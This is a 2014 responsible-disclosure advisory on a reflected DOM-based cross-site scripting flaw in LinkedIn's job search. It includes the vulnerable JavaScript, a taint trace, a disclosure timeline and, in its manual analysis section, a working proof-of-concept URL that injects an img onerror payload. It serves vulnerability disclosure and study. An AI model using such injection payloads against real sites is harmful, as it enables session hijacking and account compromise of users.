1. Project: DOM XSS Analysis
Edition: 1.6
Last Edit: 05/08/2014
Cassification: Not restricted
DOMinatorPro Enterprise
Analysis Report
Website: Linkedin.com
2. DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 1/8
Summary
1 INTRODUCTION..........................................................................................2
Disclosure Timeline..............................................................................................2
2 KEY FINDINGS............................................................................................3
HTML Injection and Reflected DOM based XSS.....................................................3
2.1.1 Description.............................................................................................................3
2.1.2 Exploitation Notes .................................................................................................3
2.1.3 DOMinatorPro Enterprise Automated Tainted Analysis .......................................3
2.1.4 Manual Analysis.....................................................................................................6
3. DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 2/8
1 Introduction
Minded Security performed an authenticated scan using DOMinatorPro Enterprise
security scanner for searching Javascript security issues across Linkedin.com website.
Herein are reported the High Risk vulnerabilities related to Linkedin.com location.
Minded Security identified the following security issues:
1) Reflected DOM based Cross Site Scripting: an attacker could be able to inject arbitrary
HTML in the browser DOM and executing arbitrary Javascript in the context of
Linkedin.com.
Disclosure Timeline
08th
June 2014 – Vulnerability Found
09th
June 2014 – Linkedin.com security team contacted
10th
June 2014 – Report with vulnerability details shared
11th
June 2014 – Vulnerability confirmed
28th
July 2014 – Fix notification received from Linkedin.com. Update: The fix was actually
faster than the fix notification. The fix was made in less than ten days.
30th
July 2014 – Publication date approved
4th
August 2014 – Publication
4. DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 3/8
2 KEY FINDINGS
HTML Injection and Reflected DOM based XSS
2.1.1 Description
This vulnerability occurs when the user input is not correctly sanitized and the output is
not encoded. An injection allows the attacker to send a malicious HTML page to a victim.
The targeted browser will not be able to distinguish (trust) the legit from the malicious
parts and consequently will parse and execute all as legit in the victim context. There is a
wide range of methods and attributes that could be used to render HTML content. If
these methods are provided with an untrusted input, then there is a high risk of XSS,
specifically an HTML injection one. Malicious HTML code could be injected for example
via innerHTML which is used to render user inserted HTML code. If strings are not
correctly sanitized the problem could lead to XSS based HTML injection.
Another method could be document.write()
2.1.2 Exploitation Notes
When trying to exploit this kind of issues, consider that some character is treated
differently by different browsers.
For reference see DOM XSS Wiki
https://code.google.com/p/domxsswiki/wiki/Introduction
2.1.3 DOMinatorPro Enterprise Automated Tainted Analysis
Vulnerable domain
www.linkedin.com
Affected URL
https://www.linkedin.com/vsearch/j?locationType=Y&f_F=adm&f_E=2,1
5. DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 4/8
Affected Javascript:
https://static.licdn.com/scds/concat/common/js?h=5gtttrez0fhqk1rr
rdqybs6gw-9vzmgtova4p6wyq7dbsmnt1j6-36auq8v5gzcgbgpv5n75nqcpk-
2a35w1u9dwchgvetamdi0zt3m-6a6p8n9gugzd0ryn13oa78kxj-
62puerwhsridwm57u01qsxtgg-bzhffmu8ocvnlrzhplrxgenzp-
56juw5ojwfpz2vfzqy5qdqiz1-e8vdu3l6plnevcvpl03eev99t-
d0ck18rz80ts0mwjk68f85n3q-arhs3x17rekxltvfsmdiddwp-
4qsv2carv9f6azb28pmyhtnv8-f1y5knzjtcxmj9x8cl51rtufk-
6rnrnyvqx3fvi8aj3mn3uv7z8-ey4d2siu9jgxr6p7xukvraecz-
1o07mzpiga70g74el55h7xky0-cubycx5zvm3dwhe0o51ze29pk-
14uchb6cxkxwro184wj55lgrl-3m0wwwerqvp8618uhx52in5b-
c58fihowoh2nty084ompqbnhm-2ypl17s5c3i6apu2k82ewhfxt-
8x5be63fehllbdraunzu3eq6z-bi130qzxq4ykvlfxrdyrjrhja-
c7v11p9r4wbi4fv9wbm6xiih6-b1qfz41z3b3boi2i3gjuzglmx-
3z3pvetds3fbixw0n28vfts1b-2bu8xuljmvyk198nas6fgwc25-
7w625ciy82qn8enruyvyr4es-2b6ka2xa7ha23666ep05spxau-
f3ibwuwgxet161wu5iic3rqmr
Stack Trace
domify()js?h=b...1cc01dk (line 11508)
b = "<fieldset class="facets...alue="2,1"/></fieldset>"
updateStickyFacets()js?h=5...ic3rqmr (line 2028)
modifyGlobalSearchAction()js?h=5...ic3rqmr (line 2035)
Vulnerable Function Beautified
If the condition is met, from the QueryString (location.Search) all parameters that starts
with “f_” are read and concatenated in a <input> list of a <fieldset> HTML tag.
LI.SearchFacets.Mediator.prototype.updateStickyFacets =
function() {
var b = YDom.get("global-search"),
g = "",
d, e, f, c, a;
if (b && (!this.hasGlobalSearchDropdownChanged &&
(this.lixStickyFacets
=== "all" || (this.lixStickyFacets === "jobs" &&
this.getVerticalType()
=== "jobs")))) {
this.removeHiddenInputs(b);
d =
6. DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 5/8
this.getQueryString().match(LI.SearchFacets.regex.facetsFromQuery
String)
|| [];
e = ['<fieldset class="facets">'];
for (c = 0, a = d.length;
c < a;
c++) {
f = d[c].split("=");
e.push('<input type="hidden" name="' + f[0] + '" value="' +
decodeURIComponent(f[1]) + '"/>')
}
e.push("</fieldset>");
b.appendChild(LI.domify(e.join("")))
}
};
String Taint History
location.search
?locationType=Y&f_F=adm&f_E=2,1&keywords=&countryCode=it&orig=JSH
P&distance=50&locationType=I
REPLACE
?,locationType=Y&f_F=adm&f_E=2,1&keywords=&countryCode=it&orig=JS
HP&distance=50&locationType=I
JOIN
locationType=Y,I&f_F=adm&f_E=2,1&countryCode=it&orig=JSHP&distanc
e=50&rsid=67274011402404052195&openFacets=L,C,F,E
REGEXP
f_E=2,1
SPLIT
2,1
DECODEURICOMPONENT
2,1
CONCAT
<input type="hidden" name="f_E" value="2,1
CONCATLEFT
<input type="hidden" name="f_E" value="2,1"/>
7. DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 6/8
JOIN
<fieldset class="facets"><input type="hidden" name="f_F"
value="adm"/><input type="hidden" name="f_E"
value="2,1"/></fieldset>
2.1.4 Manual Analysis
DOMinatorPro Enterprise automation gives a complete insight of the vulnerability risk
and the ease of exploitation. To prove the effectiveness of the analysis we added the
following proof of concept that shows the vulnerability exploit in action.
It’s also important to point out that this vulnerability can be exploited only if several
requirements are met.
Requirements
The Dom XSS Poc will work if the following requirements are satisfied:
User must be logged into Linkedin.com web portal
<!--{"content": "lix_sticky_facets":"jobs"
Or <!--{"content": "lix_sticky_facets":"all"
Note: We estimate that 60% of users are vulnerable.
Several users may have "lix_sticky_facets":"control" set so the POC would not be
successful.
Vulnerability POC
https://www.linkedin.com/vsearch/j?locationType=Y&f_F=adm&f_E=2,1
"/><img/src%3d"err"//onerror%3d"alert(document.domain)&goback=.cj
p_*1&trk=cjp_jfunc
The vulnerability is an XBrowser issue due to the decodeURIComponent(f[1]) function
used for decoding the parameters from the URL. Therefore this proof of concept will
work on most browsers like IE, Firefox and Chrome.
Browser Screenshot
8. DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 7/8